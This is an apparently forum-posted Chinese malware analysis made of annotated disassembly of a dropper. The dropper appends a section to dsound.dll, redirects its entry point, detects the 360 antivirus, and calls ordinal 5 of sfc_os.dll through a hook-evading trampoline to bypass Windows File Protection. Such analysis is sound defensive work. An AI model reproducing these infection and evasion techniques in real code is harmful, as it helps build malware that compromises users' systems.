00403DF8 |. 8D7E 1C lea edi,dword ptr ds:[esi+0x1C]
00403DFB |. 896C24 10 mov dword ptr ss:[esp+0x10],ebp
00403DFF |> 8B4424 1C /mov eax,dword ptr ss:[esp+0x1C]
00403E03 |. 6A 28 |push 0x28 ; /n = 28 (40.)
00403E05 |. 0306 |add eax,dword ptr ds:[esi] ; |
00403E07 |. 03C3 |add eax,ebx ; |
00403E09 |. 50 |push eax ; |src
00403E0A |. FF37 |push dword ptr ds:[edi] ; |dest
00403E0C |. E8 1B0A0000 |call <jmp.&MSVCRT.memcpy> ; \memcpy
00403E11 |. 834424 28 28 |add dword ptr ss:[esp+0x28],0x28
00403E16 |. 83C4 0C |add esp,0xC
00403E19 |. 83C7 04 |add edi,0x4
00403E1C |. FF4C24 10 |dec dword ptr ss:[esp+0x10] ; 拷贝区块头
00403E29 |> /8B46 18 /mov eax,dword ptr ds:[esi+0x18]
00403E2C |. |8BCE |mov ecx,esi
00403E2E |. |FF70 3C |push dword ptr ds:[eax+0x3C] ; 文件对齐值200h
00403E31 |. |8B07 |mov eax,dword ptr ds:[edi] ; 区块头
00403E33 |. |FF70 10 |push dword ptr ds:[eax+0x10] ; 区块文件大小
00403E36 |. |E8 A5FAFFFF |call Cracker.004038E0 ; 对齐后大小
00403E3B |. |50 |push eax ; /MemSize
00403E3C |. |6A 40 |push 0x40 ; |Flags = GPTR
00403E3E |. |FF15 38504000 |call dword ptr ds:[<&kernel32.GlobalAllo>; \GlobalAlloc
00403E44 |. |8947 50 |mov dword ptr ds:[edi+0x50],eax ; 开辟区块大小
00403E47 |. |8B0F |mov ecx,dword ptr ds:[edi]
00403E49 |. |FF71 10 |push dword ptr ds:[ecx+0x10] ; /n
00403E4C |. |8B49 14 |mov ecx,dword ptr ds:[ecx+0x14] ; |
00403E4F |. |030E |add ecx,dword ptr ds:[esi] ; |
00403E51 |. |51 |push ecx ; |src
00403E52 |. |50 |push eax ; |dest
00403E53 |. |E8 D4090000 |call <jmp.&MSVCRT.memcpy> ; \memcpy
00403E58 |. |83C4 0C |add esp,0xC ; 拷贝区块数据
接下来重写备份文件dsound.dll.bat 在这个文件末尾增加一个区段
00402525 |. 50 push eax ; .text6
00402526 |. E8 FF150000 call Cracker.00403B2A ; 查看是否有增加区段
0040252B |. 85C0 test eax,eax
00402545 |. FF75 0C push [arg.2] ; C:\Program Files\Common Files\System\kd******.dla(资源)
00402548 |. 8D45 EC lea eax,[local.5] ; .text8
0040254B |. 8D8D 14FFFFFF lea ecx,[local.59]
00402551 |. 68 00080000 push 0x800 ; size
00402556 |. 50 push eax ; .text8
00402557 |. E8 63140000 call Cracker.004039BF ; 增加区段
跟进
004039D0 |. FF70 3C push dword ptr ds:[eax+0x3C] ; 文件对齐200h
004039D3 |. 0FB758 06 movzx ebx,word ptr ds:[eax+0x6] ; 区块数
004039D7 |. FF75 0C push [arg.2] ; size= 800
004039DA |. E8 01FFFFFF call Cracker.004038E0 ; 对齐函数
004039DF |. 8B4E 18 mov ecx,dword ptr ds:[esi+0x18]
004039E2 |. 8945 0C mov [arg.2],eax
004039E5 |. FF71 38 push dword ptr ds:[ecx+0x38] ; 内存对齐
004039E8 |. 8BCE mov ecx,esi
004039EA |. 50 push eax
004039EB |. E8 F0FEFFFF call Cracker.004038E0 ; 1000h
004039F0 |. 8B4E 18 mov ecx,dword ptr ds:[esi+0x18]
004039F3 |. 8945 F0 mov [local.4],eax ; 内存对齐大小1000h
004039F6 |. 8B449E 18 mov eax,dword ptr ds:[esi+ebx*4+0x18] ; 最后一个区块头
004039FA |. FF71 3C push dword ptr ds:[ecx+0x3C]
004039FD |. 8B48 14 mov ecx,dword ptr ds:[eax+0x14] ; 最后区块文件偏移
00403A00 |. 0348 10 add ecx,dword ptr ds:[eax+0x10] ; 文件大小 = 最后区块文件大小+文件偏移
00403A03 |. 51 push ecx
00403A04 |. 8BCE mov ecx,esi
00403A06 |. E8 D5FEFFFF call Cracker.004038E0
00403A0B |. 8B4E 18 mov ecx,dword ptr ds:[esi+0x18]
00403A0E |. 8945 FC mov [local.1],eax ; 对齐大小59C00
00403A11 |. 8B449E 18 mov eax,dword ptr ds:[esi+ebx*4+0x18]
00403A15 |. FF71 38 push dword ptr ds:[ecx+0x38]
00403A18 |. 8B48 0C mov ecx,dword ptr ds:[eax+0xC]
00403A1B |. 0348 08 add ecx,dword ptr ds:[eax+0x8]
00403A1E |. 51 push ecx
00403A1F |. 8BCE mov ecx,esi
00403A21 |. E8 BAFEFFFF call Cracker.004038E0 ; 内存映射后大小
00403A26 |. 8D7C9E 1C lea edi,dword ptr ds:[esi+ebx*4+0x1C]
00403A2A |. 6A 28 push 0x28 ; /n = 28 (40.)
00403A2C |. 6A 00 push 0x0 ; |c = 00
00403A2E |. 8945 F8 mov [local.2],eax ; | 5C000
00403A31 |. FF37 push dword ptr ds:[edi] ; |s
00403A33 |. 897D EC mov [local.5],edi ; |
00403A36 |. E8 F70D0000 call <jmp.&MSVCRT.memset> ; \memset
00403A3B |. 8B07 mov eax,dword ptr ds:[edi]
00403A3D |. 8B4D FC mov ecx,[local.1]
00403A40 |. FF75 08 push [arg.1] ; /s
00403A43 |. 8948 14 mov dword ptr ds:[eax+0x14],ecx ; |文件偏移
00403A46 |. 8B07 mov eax,dword ptr ds:[edi] ; |
00403A48 |. 8B4D F8 mov ecx,[local.2] ; |内存映射偏移
00403A4B |. 8948 0C mov dword ptr ds:[eax+0xC],ecx ; |
00403A4E |. 8B0F mov ecx,dword ptr ds:[edi] ; |
00403A50 |. 8B45 0C mov eax,[arg.2] ; |
00403A53 |. 8941 10 mov dword ptr ds:[ecx+0x10],eax ; |文件大小
00403A56 |. 8B0F mov ecx,dword ptr ds:[edi] ; |
00403A58 |. 8941 08 mov dword ptr ds:[ecx+0x8],eax ; |
00403A5B |. 8B07 mov eax,dword ptr ds:[edi] ; |
00403A5D |. C740 24 60000>mov dword ptr ds:[eax+0x24],0xE0000060 ; |区块属性
00403A64 |. E8 BD0D0000 call <jmp.&MSVCRT.strlen> ; \strlen
00403A69 |. 50 push eax ; /n
00403A6A |. FF75 08 push [arg.1] ; |src
00403A6D |. FF37 push dword ptr ds:[edi] ; |dest
00403A6F |. E8 B80D0000 call <jmp.&MSVCRT.memcpy> ; \memcpy
00403A74 |. 83C4 1C add esp,0x1C ; 给新增加区块赋值
00403A77 |. 8D5C9E 6C lea ebx,dword ptr ds:[esi+ebx*4+0x6C]
00403A7B |. FF75 0C push [arg.2] ; /MemSize
00403A7E |. 6A 40 push 0x40 ; |Flags = GPTR
00403A80 |. FF15 38504000 call dword ptr ds:[<&kernel32.GlobalAlloc>; \GlobalAlloc
00403A86 |. 8903 mov dword ptr ds:[ebx],eax
00403A88 |. 8B46 18 mov eax,dword ptr ds:[esi+0x18]
00403A8B |. 68 65010000 push 0x165 ; /n = 165 (357.)
00403A90 |. 68 88604000 push Cracker.00406088 ; |src = Cracker.00406088
00403A95 |. 66:FF40 06 inc word ptr ds:[eax+0x6] ; |区块数加1
00403A99 |. 8B17 mov edx,dword ptr ds:[edi] ; |
00403A9B |. 8B4E 18 mov ecx,dword ptr ds:[esi+0x18] ; |
00403A9E |. 8B52 0C mov edx,dword ptr ds:[edx+0xC] ; |.text8 的 VirtualAddress
00403AA1 |. 8B41 28 mov eax,dword ptr ds:[ecx+0x28] ; |eax = 原oep(1788)
00403AA4 |. 8951 28 mov dword ptr ds:[ecx+0x28],edx ; |修改ope 重新增加区块处执行
00403AA7 |. 8B0F mov ecx,dword ptr ds:[edi] ; |
00403AA9 |. 2B41 0C sub eax,dword ptr ds:[ecx+0xC] ; |
00403AAC |. 2D 42010000 sub eax,0x142 ; |
00403AB1 |. A3 E6614000 mov dword ptr ds:[0x4061E6],eax ; |
00403AB6 |. FF33 push dword ptr ds:[ebx] ; |dest
00403AB8 |. E8 6F0D0000 call <jmp.&MSVCRT.memcpy> ; \memcpy
00403ABD |. 8B03 mov eax,dword ptr ds:[ebx] ; 拷贝(357字节大小)地址406088作作为新区段
00403ABF |. 6A 04 push 0x4 ; /n = 4
00403AC1 |. 68 F0614000 push Cracker.004061F0 ; |src = Cracker.004061F0
00403AC6 |. C680 64010000>mov byte ptr ds:[eax+0x164],0x1 ; |
00403ACD |. 8B03 mov eax,dword ptr ds:[ebx] ; |
00403ACF |. 05 66010000 add eax,0x166 ; |
00403AD4 |. 50 push eax ; |dest
00403AD5 |. E8 520D0000 call <jmp.&MSVCRT.memcpy> ; \memcpy
00403ADA |. 8B03 mov eax,dword ptr ds:[ebx] ; 拷贝CSO
00403ADC |. FF75 10 push [arg.3] ; 资源dll
00403ADF |. C680 65010000>mov byte ptr ds:[eax+0x165],0x78 ; 修改刚拷贝的第357字节为0x78
00403AE6 |. 8B03 mov eax,dword ptr ds:[ebx]
00403AE8 |. 05 6A010000 add eax,0x16A
00403AED |. 50 push eax
00403AEE |. E8 B0DBFFFF call Cracker.004016A3 ; 拷贝C:\Program Files\Common Files\System\kd******.dla路径
修改pe ,然后把修改后的pe 写回dsound.dll.bat
00403EDD |. 6A 03 push 0x3
00403EDF |. 57 push edi
00403EE0 |. FF75 08 push [arg.1] ; 打开文件dsound.dll.bat
00403EE3 |. FF55 F8 call [local.2]
00403EE6 |. 83F8 FF cmp eax,-0x1
00403EE9 |. 8945 FC mov [local.1],eax
00403EEC |. 75 04 jnz XCracker.00403EF2
00403EEE |. 6A 03 push 0x3
00403EF0 |. EB 34 jmp XCracker.00403F26
00403EF2 |> 8BCE mov ecx,esi
00403EF4 |. E8 FDF9FFFF call Cracker.004038F6
跟进这个call
修改PE
0040390C |> /FF70 38 /push dword ptr ds:[eax+0x38] ; 内存对齐1000h
0040390F |. |8B07 |mov eax,dword ptr ds:[edi]
00403911 |. |8BCE |mov ecx,esi
00403913 |. |FF70 0C |push dword ptr ds:[eax+0xC] ; 区段RVA
00403916 |. |E8 C5FFFFFF |call Cracker.004038E0
0040391B |. |8B0F |mov ecx,dword ptr ds:[edi]
0040391D |. |8941 0C |mov dword ptr ds:[ecx+0xC],eax
00403920 |. |8B46 18 |mov eax,dword ptr ds:[esi+0x18]
00403923 |. |8BCE |mov ecx,esi
00403925 |. |FF70 38 |push dword ptr ds:[eax+0x38]
00403928 |. |8B07 |mov eax,dword ptr ds:[edi]
0040392A |. |FF70 08 |push dword ptr ds:[eax+0x8] ; 区段内存大小
0040392D |. |E8 AEFFFFFF |call Cracker.004038E0 ; 对齐函数
00403932 |. |8B0F |mov ecx,dword ptr ds:[edi]
00403934 |. |8941 08 |mov dword ptr ds:[ecx+0x8],eax
00403937 |. |8B46 18 |mov eax,dword ptr ds:[esi+0x18]
0040393A |. |8BCE |mov ecx,esi
0040393C |. |FF70 3C |push dword ptr ds:[eax+0x3C] ; 200h
0040393F |. |8B07 |mov eax,dword ptr ds:[edi]
00403941 |. |FF70 14 |push dword ptr ds:[eax+0x14] ; 文件偏移
00403956 |. 8B07 |mov eax,dword ptr ds:[edi]
00403958 |. FF70 10 |push dword ptr ds:[eax+0x10] ; 文件大小
0040395B |. E8 80FFFFFF |call Cracker.004038E0 ; 对齐后大小
00403960 |. 8B0F |mov ecx,dword ptr ds:[edi]
00403962 |. 43 |inc ebx
00403963 |. 83C7 04 |add edi,0x4
00403966 |. 8941 10 |mov dword ptr ds:[ecx+0x10],eax
00403969 |. 8B46 18 |mov eax,dword ptr ds:[esi+0x18]
0040396C |. 0FB748 06 |movzx ecx,word ptr ds:[eax+0x6]
00403970 |. 3BD9 |cmp ebx,ecx
00403972 |.^ 7C 98 \jl XCracker.0040390C ; 将每个区段大小对齐
00403974 |. 5F pop edi
00403975 |> 8B449E 18 mov eax,dword ptr ds:[esi+ebx*4+0x18] ; 。text8
00403979 |. 8B48 0C mov ecx,dword ptr ds:[eax+0xC] ; VirtualAddress
0040397C |. 0348 08 add ecx,dword ptr ds:[eax+0x8] ; ecx = sizeOfImage
0040397F |. 8B46 18 mov eax,dword ptr ds:[esi+0x18] ; pe
00403982 |. 8948 50 mov dword ptr ds:[eax+0x50],ecx ; 更该 SizeOfImage
00403985 |. 8B46 18 mov eax,dword ptr ds:[esi+0x18]
00403988 |. 89A8 C8000000 mov dword ptr ds:[eax+0xC8],ebp
0040398E |. 8B46 18 mov eax,dword ptr ds:[esi+0x18]
00403991 |. 89A8 CC000000 mov dword ptr ds:[eax+0xCC],ebp
00403997 |. 8B46 18 mov eax,dword ptr ds:[esi+0x18]
0040399A |. 89A8 D0000000 mov dword ptr ds:[eax+0xD0],ebp
004039A0 |. 8B46 18 mov eax,dword ptr ds:[esi+0x18]
004039A3 |. 89A8 D4000000 mov dword ptr ds:[eax+0xD4],ebp
004039A9 |. 8B46 18 mov eax,dword ptr ds:[esi+0x18]
004039AC |. 89A8 D8000000 mov dword ptr ds:[eax+0xD8],ebp ; 修改 目录表
可以发现这个病毒使用一个结构体存放PE信息
[esi+8] = IMAGE_DOS_HEADER (0x40)
[esi+10] = A8 //MS_DOS 大小
[esi+C] = MS_DOS
[esi+14] = IMAGE_DOS_Header大小 = 0x40
[esi+18] = Image_Nt_Header
[esi+1C] = 存放Image_section_header 转到这个地址可以发现
0012F3B8 18 3C 39 00 48 3C 39 00 78 3C 39 00 A8 3C 39 00 <9.H<9.x<9.?9.
0012F3C8 D8 3C 39 00 08 3D 39 00 38 3D 39 00 68 3D 39 00 ?9.=9.8=9.h=9.
0012F3D8 98 3D 39 00 C8 3D 39 00 F8 3D 39 00 28 3E 39 00 ?9.?9.?9.(>9.
0012F3E8 58 3E 39 00 88 3E 39 00 B8 3E 39 00 E8 3E 39 00 X>9.?9.?9.?9.
这个存放了各个区块头
上面这点发现了,,接下来就比较简单了
00403E7F |. 8B3D 00504000 mov edi,dword ptr ds:[<&kernel32.LoadLibr>; kernel32.LoadLibraryA
00403E85 |. 8BF1 mov esi,ecx
00403E87 |. BB 10604000 mov ebx,Cracker.00406010 ; ASCII "Kernel32.dll"
00403E8C |. 68 50604000 push Cracker.00406050 ; ASCII "CloseHandle"
00403E91 |. 8326 00 and dword ptr ds:[esi],0x0
00403E94 |. 53 push ebx ; /FileName => "Kernel32.dll"
00403E95 |. FFD7 call edi ; \LoadLibraryA
00403E97 |. 50 push eax
00403E98 |. E8 83DAFFFF call Cracker.00401920
00403E9D |. 59 pop ecx
00403E9E |. 8945 F4 mov [local.3],eax
00403EA1 |. 59 pop ecx
00403EA2 |. 68 44604000 push Cracker.00406044 ; ASCII "CreateFileA"
00403EE0 |. FF75 08 push [arg.1] ; 打开文件dsound.dll.bat
00403EE3 |. FF55 F8 call [local.2]
00403EE6 |. 83F8 FF cmp eax,-0x1
00403EE9 |. 8945 FC mov [local.1],eax
00403EEC |. 75 04 jnz XCracker.00403EF2
00403EEE |. 6A 03 push 0x3
00403EF0 |. EB 34 jmp XCracker.00403F26
00403EF2 |> 8BCE mov ecx,esi
00403EF4 |. E8 FDF9FFFF call Cracker.004038F6
00403EF9 |. 8B46 18 mov eax,dword ptr ds:[esi+0x18]
00403EFC |. 0FB740 06 movzx eax,word ptr ds:[eax+0x6] ; 区段 = 5
00403F00 |. 8B4486 18 mov eax,dword ptr ds:[esi+eax*4+0x18] ; .text8段
00403F04 |. 8B48 14 mov ecx,dword ptr ds:[eax+0x14] ; ecx = 指向文件偏移
00403F07 |. 8B40 10 mov eax,dword ptr ds:[eax+0x10] ; eax = 该区块文件大小
00403F0A |. 03C1 add eax,ecx ; eax = 文件大小
00403F0C |. 50 push eax ; /MemSize
00403F0D |. 6A 40 push 0x40 ; |Flags = GPTR
00403F0F |. 8946 04 mov dword ptr ds:[esi+0x4],eax ; |
00403F12 |. FF15 38504000 call dword ptr ds:[<&kernel32.GlobalAlloc>; \GlobalAlloc
00403F18 |. 85C0 test eax,eax ; 开辟空间
00403F31 |> \6A 40 push 0x40 ; /n = 40 (64.)
00403F33 |. FF76 08 push dword ptr ds:[esi+0x8] ; |存放IMAGE_DOS_HANDLE
00403F36 |. 50 push eax ; |dest
00403F37 |. E8 F0080000 call <jmp.&MSVCRT.memcpy> ; \memcpy
00403F3C |. 8B46 10 mov eax,dword ptr ds:[esi+0x10]
00403F3F |. 83C4 0C add esp,0xC
00403F42 |. A9 00000080 test eax,0x80000000
00403F47 |. 75 12 jnz XCracker.00403F5B
00403F49 |. 50 push eax ; /MS_DOS 大小
00403F4A |. 8B46 14 mov eax,dword ptr ds:[esi+0x14] ; |IMAGE_DOS_Hander 大小
00403F4D |. FF76 0C push dword ptr ds:[esi+0xC] ; |src
00403F50 |. 0306 add eax,dword ptr ds:[esi] ; |
00403F52 |. 50 push eax ; |dest
00403F53 |. E8 D4080000 call <jmp.&MSVCRT.memcpy> ; \memcpy
00403F58 |. 83C4 0C add esp,0xC
00403F5B |> \8B46 08 mov eax,dword ptr ds:[esi+0x8]
00403F5E |. BB F8000000 mov ebx,0xF8
00403F63 |. 53 push ebx ; /n => F8 (248.)
00403F64 |. 8B40 3C mov eax,dword ptr ds:[eax+0x3C] ; |e_lfanew
00403F67 |. FF76 18 push dword ptr ds:[esi+0x18] ; |src
00403F6A |. 0306 add eax,dword ptr ds:[esi] ; |Image_nt_Header
00403F6C |. 50 push eax ; |dest
00403F6D |. E8 BA080000 call <jmp.&MSVCRT.memcpy> ; \memcpy
00403F72 |. 8B46 08 mov eax,dword ptr ds:[esi+0x8]
00403F75 |. 83C4 0C add esp,0xC
00403F78 |. 8B78 3C mov edi,dword ptr ds:[eax+0x3C]
00403F7B |. 8B46 18 mov eax,dword ptr ds:[esi+0x18]
00403F7E |. 03FB add edi,ebx ; edi = 区块头(偏移)
00403F80 |. 0FB740 06 movzx eax,word ptr ds:[eax+0x6] ; 区块数
00403F84 |. 85C0 test eax,eax
00403F86 |. 8945 F0 mov [local.4],eax
00403F89 |. 76 52 jbe XCracker.00403FDD
00403F8B |. 8365 08 00 and [arg.1],0x0
00403F8F |. 8D5E 1C lea ebx,dword ptr ds:[esi+0x1C] ; IMage_SECTION_Header
00403F92 |. 8945 F8 mov [local.2],eax
00403F95 |> 8B45 08 /mov eax,[arg.1]
00403F98 |. 6A 28 |push 0x28 ; /n = 28 (40.)
00403F9A |. 0306 |add eax,dword ptr ds:[esi] ; |
00403F9C |. FF33 |push dword ptr ds:[ebx] ; |IMAGE_SECTION_HEADER
00403F9E |. 03C7 |add eax,edi ; |
00403FA0 |. 50 |push eax ; |dest
00403FA1 |. E8 86080000 |call <jmp.&MSVCRT.memcpy> ; \memcpy
00403FA6 |. 8345 08 28 |add [arg.1],0x28
00403FAA |. 83C4 0C |add esp,0xC
00403FAD |. 83C3 04 |add ebx,0x4
00403FB0 |. FF4D F8 |dec [local.2] ; count = 6
00403FB3 |.^ 75 E0 \jnz XCracker.00403F95
00403FBF |. 8BD8 mov ebx,eax
00403FC1 |> 8B07 /mov eax,dword ptr ds:[edi]
00403FC3 |. FF70 10 |push dword ptr ds:[eax+0x10] ; /区块 SizeOfRawData
00403FC6 |. 8B40 14 |mov eax,dword ptr ds:[eax+0x14] ; |文件指针
00403FC9 |. 0306 |add eax,dword ptr ds:[esi] ; |
00403FCB |. FF77 50 |push dword ptr ds:[edi+0x50] ; |src
00403FCE |. 50 |push eax ; |dest
00403FCF |. E8 58080000 |call <jmp.&MSVCRT.memcpy> ; \memcpy
00403FD4 |. 83C4 0C |add esp,0xC
00403FD7 |. 83C7 04 |add edi,0x4
00403FDA |. 4B |dec ebx ; 拷贝个区块数据
00403FDB |.^ 75 E4 \jnz XCracker.00403FC1
00403FDD |> 8B5D FC mov ebx,[local.1] ; dsound.dll,bat
00403FE0 |. 8B3D 14504000 mov edi,dword ptr ds:[<&kernel32.SetFileP>; kernel32.SetFilePointer
00403FE6 |. 33C0 xor eax,eax
00403FE8 |. 50 push eax ; /Origin => FILE_BEGIN
00403FE9 |. 50 push eax ; |pOffsetHi => NULL
00403FEA |. 50 push eax ; |OffsetLo => 0
00403FEB |. 53 push ebx ; |hFile
00403FEC |. FFD7 call edi ; \SetFilePointer
00403FEE |. 8D45 EC lea eax,[local.5]
00403FF1 |. 6A 00 push 0x0 ; /pOverlapped = NULL
00403FF3 |. 50 push eax ; |pBytesWritten
00403FF4 |. FF76 04 push dword ptr ds:[esi+0x4] ; |nBytesToWrite
00403FF7 |. FF36 push dword ptr ds:[esi] ; |Buffer
00403FF9 |. 53 push ebx ; |hFile
00403FFA |. FF15 1C504000 call dword ptr ds:[<&kernel32.WriteFile>] ; \WriteFile
接下来生成系统目录\system\dsound.dll.****(随机生成的) 并且移动dsound.dll到dsound.dll.****
004044AE |. C645 DE 41 mov byte ptr ss:[ebp-0x22],0x41 ; MoveFileEx , CopyFile
004044B2 |. 885D DF mov byte ptr ss:[ebp-0x21],bl
004044B5 |. FFD6 call esi
004044B7 |. 50 push eax
004044B8 |. E8 63D4FFFF call Cracker.00401920
004044BD |. 59 pop ecx
004044BE |. 8945 AC mov [local.21],eax ; [local.21] = Copyfile
004044C1 |. 59 pop ecx
004044C2 |. 8D45 D4 lea eax,[local.11]
004044C5 |. 50 push eax
004044C6 |. 57 push edi
004044C7 |. FFD6 call esi
004044C9 |. 50 push eax
004044CA |. E8 51D4FFFF call Cracker.00401920
004044CF |. 8945 08 mov [arg.1],eax ; [arg1] = MovefileEx
004044D2 |. 8D85 94FDFFFF lea eax,[local.155]
004044D8 |. 50 push eax ; C:\Windows\system32\dsound.dll
004044D9 |. E8 E6D2FFFF call Cracker.004017C4
004044DE |. 83C4 0C add esp,0xC
004044E1 |. 85C0 test eax,eax
004044E3 |. 0F84 87000000 je Cracker.00404570
004044E9 |. 8D85 8CFBFFFF lea eax,[local.285] ; C:\Windows\system32\dsound.dll.CNCL
004044EF |. 50 push eax
004044F0 |. E8 CFD2FFFF call Cracker.004017C4 ; 判断文件是否存在
接下来查看是否有360
004041AA |. C645 F4 33 mov byte ptr ss:[ebp-0xC],0x33
004041AE |. C645 F5 36 mov byte ptr ss:[ebp-0xB],0x36
004041B2 |. C645 F6 30 mov byte ptr ss:[ebp-0xA],0x30
004041B6 |. C645 F7 74 mov byte ptr ss:[ebp-0x9],0x74
004041BA |. C645 F8 72 mov byte ptr ss:[ebp-0x8],0x72
004041BE |. C645 F9 61 mov byte ptr ss:[ebp-0x7],0x61
004041C2 |. C645 FA 79 mov byte ptr ss:[ebp-0x6],0x79
004041C6 |. C645 FB 2E mov byte ptr ss:[ebp-0x5],0x2E
004041CA |. C645 FC 65 mov byte ptr ss:[ebp-0x4],0x65
004041CE |. C645 FD 78 mov byte ptr ss:[ebp-0x3],0x78
004041D2 |. C645 FE 65 mov byte ptr ss:[ebp-0x2],0x65 ; 360tray.exe
004041D6 |. E8 25CEFFFF call Cracker.00401000
call 401000 使用CreateToolhelp32Snapshot,Process32First,Process32Next 查看是否有360
跟进接下来一个call 这个call就是这个病毒怎么过360j检测的
如果存在,则利用技巧躲避360的api调用检查来调用sfc_os.dll5号函数,从而修改系统文件,躲过360.
00404069 . C645 DF 65 mov byte ptr ss:[ebp-0x21],0x65
0040406D . 8065 E0 00 and byte ptr ss:[ebp-0x20],0x0 ; SeDebugPrivilege
00404071 . 6A 01 push 0x1
00404073 . 8D45 D0 lea eax,dword ptr ss:[ebp-0x30]
00404076 . 50 push eax
00404077 . E8 B3D3FFFF call Cracker.0040142F ; 提权
0040407C . 59 pop ecx
0040407D . 59 pop ecx
0040407E . C645 E4 73 mov byte ptr ss:[ebp-0x1C],0x73
00404082 . C645 E5 66 mov byte ptr ss:[ebp-0x1B],0x66
00404086 . C645 E6 63 mov byte ptr ss:[ebp-0x1A],0x63
0040408A . C645 E7 5F mov byte ptr ss:[ebp-0x19],0x5F
0040408E . C645 E8 6F mov byte ptr ss:[ebp-0x18],0x6F
00404092 . C645 E9 73 mov byte ptr ss:[ebp-0x17],0x73
00404096 . C645 EA 2E mov byte ptr ss:[ebp-0x16],0x2E
0040409A . C645 EB 64 mov byte ptr ss:[ebp-0x15],0x64
0040409E . C645 EC 6C mov byte ptr ss:[ebp-0x14],0x6C
004040A2 . C645 ED 6C mov byte ptr ss:[ebp-0x13],0x6C
004040A6 . 8065 EE 00 and byte ptr ss:[ebp-0x12],0x0 ; sfc_os.dll
004040AA . 68 04010000 push 0x104 ; /n = 104 (260.)
004040AF . 6A 00 push 0x0 ; |c = 00
004040B1 . 68 2C634000 push Cracker.0040632C ; |s = Cracker.0040632C
004040B6 . E8 77070000 call <jmp.&MSVCRT.memset> ; \memset
004040BB . 83C4 0C add esp,0xC
004040BE . 68 82000000 push 0x82 ; /WideBufSize = 82 (130.)
004040C3 . 68 2C634000 push Cracker.0040632C ; |WideCharBuf = Cracker.0040632C
004040C8 . FF75 08 push dword ptr ss:[ebp+0x8] ; |/String
004040CB . FF15 54504000 call dword ptr ds:[<&kernel32.lstrlen>; |\lstrlenA
004040D1 . 50 push eax ; |StringSize
004040D2 . FF75 08 push dword ptr ss:[ebp+0x8] ; |StringToMap
004040D5 . 6A 00 push 0x0 ; |Options = 0
004040D7 . 6A 00 push 0x0 ; |CodePage = CP_ACP
004040D9 . FF15 08504000 call dword ptr ds:[<&kernel32.MultiBy>; \MultiByteToWideChar
004040DF . 8D45 E4 lea eax,dword ptr ss:[ebp-0x1C]
004040E2 . 50 push eax ; /FileName
004040E3 . FF15 00504000 call dword ptr ds:[<&kernel32.LoadLib>; \LoadLibraryA
004040E9 . 8945 F8 mov dword ptr ss:[ebp-0x8],eax ; LoadLirbary("scf_os.dll")
004040EC . 837D F8 00 cmp dword ptr ss:[ebp-0x8],0x0
004040F0 . 75 07 jnz XCracker.004040F9
004040F2 . 33C0 xor eax,eax
004040F4 . E9 9E000000 jmp Cracker.00404197
004040F9 > 8365 F0 00 and dword ptr ss:[ebp-0x10],0x0
004040FD . 6A 05 push 0x5 ; 5
004040FF . FF75 F8 push dword ptr ss:[ebp-0x8] ; HMOdule
00404102 . E8 19D8FFFF call Cracker.00401920
00404107 . 59 pop ecx ; 获取5号函数指针
00404108 . 59 pop ecx
00404109 . 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040410C . 8B45 F4 mov eax,dword ptr ss:[ebp-0xC]
0040410F . 8945 FC mov dword ptr ss:[ebp-0x4],eax
00404112 . 0FB605 286340>movzx eax,byte ptr ds:[0x406328]
00404119 . 83E0 01 and eax,0x1
0040411C . 85C0 test eax,eax
0040411E . 75 22 jnz XCracker.00404142
00404120 . A0 28634000 mov al,byte ptr ds:[0x406328]
00404125 . 0C 01 or al,0x1
00404127 . A2 28634000 mov byte ptr ds:[0x406328],al
0040412C . 6A 0A push 0xA ; /dwBytes = A (10.)
0040412E . 6A 08 push 0x8 ; |dwFlags = HEAP_ZERO_MEMORY
00404130 . FF15 50504000 call dword ptr ds:[<&kernel32.GetProc>; |[GetProcessHeap
00404136 . 50 push eax ; |hHeap
00404137 . FF15 4C504000 call dword ptr ds:[<&kernel32.HeapAll>; \RtlAllocateHeap
0040413D . A3 24634000 mov dword ptr ds:[0x406324],eax ; 堆中分配10字节空间
00404142 > 6A 05 push 0x5 ; /n = 5
00404144 . FF75 FC push dword ptr ss:[ebp-0x4] ; | 复制5号函数的前5个字节内容到分配的堆空间中
00404147 . FF35 24634000 push dword ptr ds:[0x406324] ; |dest = 00154808
0040414D . E8 DA060000 call <jmp.&MSVCRT.memcpy> ; \memcpy
00404152 . 83C4 0C add esp,0xC
00404155 . A1 24634000 mov eax,dword ptr ds:[0x406324]
0040415A . C640 05 E9 mov byte ptr ds:[eax+0x5],0xE9 ; 覆盖第6个字节 为 jmp
0040415E . 8B45 FC mov eax,dword ptr ss:[ebp-0x4]
00404161 . 2B05 24634000 sub eax,dword ptr ds:[0x406324]
00404167 . 83E8 05 sub eax,0x5 ; 计算jmp 地址
0040416A . 8B0D 24634000 mov ecx,dword ptr ds:[0x406324]
00404170 . 8941 06 mov dword ptr ds:[ecx+0x6],eax ; 写入jmp地址
00404173 . 6A FF push -0x1
00404175 . 68 2C634000 push Cracker.0040632C ; UNICODE "C:\WINDOWS\system32\dsound.dll"
0040417A . 6A 00 push 0x0
0040417C . E8 00000000 call Cracker.00404181 ; 下面四句计算返回地址40418C,并压入栈
00404181 $ 58 pop eax
00404182 . 83C0 0B add eax,0xB
00404185 . 50 push eax
00404186 .- FF25 24634000 jmp dword ptr ds:[0x406324] ; 调转到开辟10字节堆空间
0040418C . FF75 F8 push dword ptr ss:[ebp-0x8] ; /hLibModule
0040418F . FF15 48504000 call dword ptr ds:[<&kernel32.FreeLib>; \FreeLibrary
00404195 . 33C0 xor eax,eax
00404197 > 5F pop edi
00404198 . 5E pop esi
00404199 . 5B pop ebx
0040419A . C9 leave
0040419B . C3 retn
0040455B |. /74 13 je XCracker.00404570
0040455D |. |8D85 8CFBFFFF lea eax,[local.285]
00404563 |. |6A 01 push 0x1
00404565 |. |50 push eax ; C:\Windows\system32\dsound.dll.CNCL
00404566 |. |8D85 94FDFFFF lea eax,[local.155]
0040456C |. |50 push eax ; C:\Windows\system32\dsound.dll
0040456D |. |FF55 08 call [arg.1] ; MoveFileEx
00404570 |> \8D85 98FEFFFF lea eax,[local.90]
00404576 |. 50 push eax ; C:\Windows\system32\DllCache\dsound.dll
到这里母体就差不多了,,,,看来还有一些主要的功能是在dll,,,改天再看了。洗洗睡觉。这次就不写总结了,,,,,
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课